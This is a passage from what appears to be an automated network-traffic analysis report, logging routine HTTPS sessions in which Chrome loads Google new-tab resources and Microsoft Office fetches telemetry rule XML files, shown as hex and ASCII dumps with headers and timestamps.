                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC652INData Raw: 32 38 35 0d 0a 6e 4e 6f 63 7a 42 47 54 6b 51 72 4d 46 67 30 4d 7a 68 68 4d 58 4e 6b 63 47 35 71 4e 7a 46 31 5a 6b 68 50 5a 58 6c 42 61 55 5a 5a 5a 56 49 31 56 33 52 45 52 46 70 34 4e 47 52 53 4d 6c 5a 49 55 33 52 59 5a 45 6f 33 61 6a 5a 44 64 46 46 31 4d 47 64 33 52 32 56 31 4e 6b 68 45 4c 31 64 6c 64 31 67 76 4c 31 6f 36 48 45 45 67 51 32 68 68 63 6d 78 70 5a 53 42 43 63 6d 39 33 62 69 42 55 61 47 46 75 61 33 4e 6e 61 58 5a 70 62 6d 64 4b 42 79 4e 68 4d 7a 51 78 4e 47 56 53 53 57 64 7a 58 33 4e 7a 63 44 31 6c 53 6e 70 71 4e 48 52 55 55 44 46 55 59 33 64 4c 59 33 64 36 54 57 70 47 5a 7a 6c 4b 53 6b 74 36 61 32 64 7a 65 58 4e 73 54 56 5a 56 5a 33 46 35 61 56 39 51 56 58 6c 71 53 6c 4e 4e 65 6b 78 4d 61 7a 64 51 54 45 31 32 54 56 4e 33 59 30 45 34 5a 32 39
                                                                                                                                                                                                                                                                                                                    Data Ascii: 285nNoczBGTkQrMFg0MzhhMXNkcG5qNzF1ZkhPZXlBaUZZZVI1V3RERFp4NGRSMlZIU3RYZEo3ajZDdFF1MGd3R2V1NkhEL1dld1gvL1o6HEEgQ2hhcmxpZSBCcm93biBUaGFua3NnaXZpbmdKByNhMzQxNGVSSWdzX3NzcD1lSnpqNHRUUDFUY3dLY3d6TWpGZzlKSkt6a2dzeXNsTVZVZ3F5aV9QVXlqSlNNekxMazdQTE12TVN3Y0E4Z29
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    17192.168.2.749724142.250.181.684437876C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    18192.168.2.749728142.250.181.684437876C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Version: 699875240
                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                    Accept-CH: Save-Data
                                                                                                                                                                                                                                                                                                                    Accept-CH: Downlink
                                                                                                                                                                                                                                                                                                                    Accept-CH: ECT
                                                                                                                                                                                                                                                                                                                    Accept-CH: RTT
                                                                                                                                                                                                                                                                                                                    Accept-CH: Device-Memory
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC271INData Raw: 31 36 65 39 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: 16e9)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 75 30 30 33 64 5c 22 67 62 5f 50 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 6b 64 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64
                                                                                                                                                                                                                                                                                                                    Data Ascii: u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabind
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69
                                                                                                                                                                                                                                                                                                                    Data Ascii: role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdi
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 68 3f 73 6f 75 72 63 65 5c 75 30 30 33 64 6e 74 70 5c 22 20 74 61 72 67 65 74 5c 75 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: h?source\u003dntp\" target\u003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: ,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC42INData Raw: 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: trol-label0","left_product_control-label
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC302INData Raw: 31 32 37 0d 0a 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 38 2c 33 37 30 31 33 38 34 2c 31 30 31 34 32 30 36 36 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1271","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700248,3701384,101420669],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrap
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 38 30 30 30 0d 0a 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 7a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 7a 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64
                                                                                                                                                                                                                                                                                                                    Data Ascii: 8000unction(_){var window\u003dthis;\ntry{\n_.zd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.zd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.ad
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4b 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 48 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 5b 49 64 28 5c 22 64 61 74 61 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c
                                                                                                                                                                                                                                                                                                                    Data Ascii: 3dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Ld\u003dnew _.Kd(\"about:invalid#zClosurez\");_.Hd\u003dclass{constructor(a){this.ih\u003da}};_.Md\u003d[Id(\"data\"),Id(\"http\"),Id(\"https\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: ent){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    19192.168.2.749729142.250.181.684437876C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Version: 699875240
                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:24 GMT
                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    20192.168.2.74973413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:25 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080625Z-174f7845968frfdmhC1EWRxxbw0000000wm000000000bkuw
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    21192.168.2.74973513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
